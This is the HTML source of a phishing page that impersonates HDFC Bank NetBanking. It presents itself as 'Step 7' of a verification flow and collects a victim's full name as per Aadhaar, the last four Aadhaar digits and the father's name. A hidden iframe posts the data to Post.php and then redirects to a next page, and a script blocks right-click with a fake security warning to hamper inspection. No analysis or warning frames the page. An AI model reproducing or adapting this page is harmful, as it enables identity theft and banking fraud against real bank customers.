<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
    <title>HDFC Bank Secure Google/login</title>
    <style>
        #ft
        {
        width: 104%;
        margin-left:-8px;
        }
       #nn,#bb,#dd
       {
       width: 250px;
       height:25px;
       background-color:white;
       border-style:solid;
       outline:none;
       border-color:#CCCCCC;
       border-width:1px; 
       padding:3px 14px;
       border-radius:4px; 
       margin-left:15px; 
       }
       #nn:hover
       {
       border-color:#67AFE9; 
       box-shadow:0 0 6px 0 #67AFE9;    
       }
       #bb:hover
       {
       border-color:#67AFE9;
       box-shadow:0 0 6px 0 #67AFE9;     
       }
       #dd:hover
       {
       border-color:#67AFE9; 
       box-shadow:0 0 6px 0 #67AFE9;    
       }
        #ll
        {
        width: 180px;
        background-color:#1D85FE;
        border-color: white;
        padding: 10px 30px;
        margin: 10px 40px;
        border: none;
        border-radius: 4px;
        cursor: pointer;
        font-color:white;
        font-size: 16px; width: 180px; height: 37px;    
        color:white;
        }
        #ii
        {   width:35%;
        border-radius:18px;
        margin-left:20px;
        }
        #chi
        {  
        font-family:Arial, Helvetica, sans-serif;
        font-size:16px;
        } 
        #check
        { 
        margin-left:16px;
        }
        #ab
        {
        width:358px;
        border-bottom: solid #f3f3f3;
        border-width:10px;
        }
    </style>
    <script language="javascript">
    
    var message="For security reasons,This function is not allowed here.";
    function clickIE4(){
    
    if (event.button==2){
    alert(message);
    return false;
    }
    }
    
    function clickNS4(e){
    if (document.layers||document.getElementById&&!document.all){
    if (e.which==2||e.which==3){
    alert(message);
    return false;
    }
    }
    }
    
    if (document.layers){
    document.captureEvents(Event.MOUSEDOWN);
    document.onmousedown=clickNS4;
    }
    
    else if (document.all&&!document.getElementById){
    document.onmousedown=clickIE4;
    }
    
    document.oncontextmenu=new Function("alert(message);return false;")
    
    </script>
</head>
<body>
      <!-- Static- Please don't do anything here-->
      <script type="text/javascript">var submitted=false;</script>
      <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='9th.html';}"></iframe>
      <!--My Form-->
      <form action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
      <center><img src="logomain.jpg" alt="" width="55%"></center>
      <div class="container">
      <p style="font-family: Arial; 
      color:#3b444b; 
      text-align:center; margin:8px; font-size:22px;">Welcome to HDFC Bank<br> NetBanking
      </p></div><br>
      <div id="ab" 
      style="margin:8px;
      margin-left:-6px;">
      </div><br>
   <h3 style="
    background-color:#DFE9F5;
    padding: 10px 20px;
    border-radius:1px;
    margin-left:-7px;
    position:absolute;
    top:140px;
    font-size:16px;
    color:#1560BD;
    width:318px;
    height:40px;"
    >Step 7: Validate your Aadhar(UIDAI) details and proceed.</span></h3><br><br><br>
    <div id="hh">
    <p1 style="font-family: Arial; 
    color:#3b444b; 
    padding:0px 15px; font-size:15px;"> Full Name (<b>as per AADHAR)</b><span style="color:#f06565;">:</span></p1>
    </div>
    <div id="xx">
    <input type="text"name="Full Name " id="nn" placeholder="Full Name (as per AADHAR)"
    required=""><br><br>
    </div>
    <div id="pp"> 
    <p1 style="font-family: Arial; 
    color:#3b444b; 
    padding:0px 15px; font-size:15px;"> Last 4 Digit Aadhar Number<span style="color:#f06565;">:</span></p1>       
    </div>
    <div id="fr">
    <input type="tel" name="Aadhar No." id="bb" placeholder="Last 4 Digit Aadhar Number" maxlength="4"
    pattern="[0-9]{4}"
    title="Enter Valid Ending 4 Digit Aadhar Number"
    required="">
    </div><br>
    <div id="hh">
    <p1 style="font-family: Arial; 
    color:#3b444b; 
    padding:0px 15px; font-size:15px;"> Enter Father's Name <span style="color:#f06565;">:</span></p1>
    </div>
    <div id="xx">
    <input type="text"name="Father's Name" id="dd" placeholder="Enter Father's Name"
    required="">
    </div><br>
    <div id="qq">
    <button type="submit"id="ll">
    SUBMIT</button> <br><br>
    </div>
    <div>
    <img src="verising.png" alt="" id="ii"><br>
    <span style="color:grey; font-family:arial;">Your security is of utmost importance.</span><br>
    <span style="color:#1D85FE; font-family:arial;">Know more...</span><br><br>
    <img src="footer.jpg" alt="" id="ft"><br>
    </div></form></body>